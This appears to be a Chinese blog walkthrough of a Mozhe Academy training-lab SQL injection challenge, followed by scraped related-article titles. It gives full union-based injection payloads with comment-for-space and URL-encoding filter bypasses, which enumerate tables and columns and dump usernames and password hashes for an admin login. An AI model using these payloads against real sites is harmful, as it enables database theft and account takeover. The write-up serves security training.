靶场地址:

SQL过滤字符后手工注入漏洞测试(第1题)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。

今天来学习墨者学院中的字符过滤靶场

我们打开靶场

我们进到靶场看到一个登录页面

看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来..

然后仔细看到下方有个导航条我我们点进去

注意看这个URL,我就怀疑注入点在这里,然后打开工具尝试注入

但是我发现无论输入什么数据,他都跳回到主页面。那就可以猜测页面是过滤了字符的,那我们就想想能把什么字符进行转义

空格可以用/**/来转义

=号可以用URL编码(或者Like)

那我们就可以构造判断是否存在注入的语句

/**/and/**/1=1

然后进行URL编码,变成

/%2a%2a/%61%6e%64/%2a%2a/%31=%31

我们进行尝试闭合语句,在尝试多次后判断是数字型注入,无需闭合,那我们开始判断注入

我们可以很显然的看到,在1=1的条件成立的时候页面有回显,但是在1=2的时候页面不进行回显,那么我们可以判断页面是有注入的。那我们先查看列数,构造

/**/order/**/by/**/1

/%2a%2a/%6f%72%64%65%72/%2a%2a/%62%79/%2a%2a/%31

可以看到order by为5的时候页面没有了回显,说明页面只有4列数据

然后判断页面回显位置

/**/union/**/select/**/1,2,3,4

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%32%2c%33%2c%34

可以看到页面在字段2、3的地方有了回显,接下来可以判断数据库

/**/union/**/select/**/1,database(),3,4

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%64%61%74%61%62%61%73%65%28%29%2c%33%2c%34

获取表:

/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema=database()

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%74%61%62%6c%65%5f%6e%61%6d%65%29%2c%33%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73/%2a%2a/%77%68%65%72%65/%2a%2a/%74%61%62%6c%65%5f%73%63%68%65%6d%61=%64%61%74%61%62%61%73%65%28%29

获取列:

/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name='notice'

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%2c%33%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73/%2a%2a/%77%68%65%72%65/%2a%2a/%74%61%62%6c%65%5f%6e%61%6d%65=%27%6e%6f%74%69%63%65%27

/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name='stormgroup_member'

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%2c%33%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73/%2a%2a/%77%68%65%72%65/%2a%2a/%74%61%62%6c%65%5f%6e%61%6d%65=%27%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72%27

很明显第二个表的列名比较符合我们所需,我们查看第二个表的name和password字段

/**/union/**/select/**/1,group_concat(name),group_concat(password),4/**/from/**/stormgroup_member

/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%6e%61%6d%65%29%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%70%61%73%73%77%6f%72%64%29%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72

我们就把账号密码求出来了,但是密码是加密后的,我们去解密一下

三个密码就被我们解密出来了。我们拿账号登录一下。

登录mozhe的账号显示

登录admin的账号即获取flag(还得是admin)

以后可能靶场更新频率做不到一天一更..

墨者学院—SQL过滤字符后手工注入漏洞测试相关推荐

  1. SQL过滤字符后手工注入漏洞测试(第1题)

    https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe 分析题目,属于时间盲注,这种情况,通常使用sq ...

  2. 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)

    问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...

  3. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  4. SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Sql Server数据库). 地址:http://219.153.49.228:42295/new_list.asp?id=2( ...

  5. Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...

  6. 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)

    今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...

  7. MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(MongoDB数据库). 地址:http://124.70.71.251:46804/new_list.php?id=1(注意这里 ...

  8. SQL手工注入漏洞测试(Oracle数据库)

    SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院 ...

  9. 《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 一:思路 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭 ...

最新文章

  1. 2019微生物组—宏基因组分析专题培训开课啦!
  2. c语言数组最大元调换,c语言数组元素交换有关问题,请高手过来看看
  3. linux下查看BLAST程序,Linux下BLAST的使用---转载
  4. python合并路径_python url合并与分离
  5. 深入理解分布式技术 - 分库分表后的唯一主键解决方案
  6. 刷新你的数据中心冷却词汇
  7. 一、linux搭建jenkins+github详细步骤
  8. 跟随者数字解码_跟随模式的数字
  9. Ksplice:不再重启你的Linux
  10. AD21 DXP 快捷键失效的解决办法
  11. 大学四年的最后一篇日志,致敬2012-2016那些似水流年
  12. android zip格式的ndk,Android 使用NDK (JNI)容易解压7z压缩文件
  13. css 文字两端对齐
  14. 8.NP交换部分内容汇总及VLAN
  15. LaySNS模板仿RiPro日主题素材源码资源下载响应式CMS模板
  16. 亚马逊,速卖通,国际站卖家在做测评时如何将风险降到最低呢?
  17. 安徽省计算机二级VB笔试题,2020年9月安徽省计算机二级易考套餐:二级VB考试题库+教材...
  18. 基于ar9331 mips架构AP121 uboot分析(3) 启动流程
  19. dice系数 交叉熵_一文搞懂交叉熵损失
  20. Prompt (提示)

热门文章

  1. 传感器精度和分辨率的区别
  2. 安装包UI美化之路-在线安装包
  3. 20行代码爬取原神角色全图
  4. 亚马逊云科技自动驾驶赛车竞赛,一场AI与速度激情碰撞的大赛
  5. 【转载】选择性搜索算法介绍——Selective Search
  6. SnapMotion for Mac(视频截图工具)
  7. 工具类产品应该如何运营推广?
  8. 麒麟信安参与共建的 中国首个桌面操作系统根社区openKylin即将发布
  9. SQL错误(1366):Incorrect String Value
  10. 计算机语言中的逻辑异或的应用,异或同或门逻辑符号_利用或门和非门设计的异或门方案...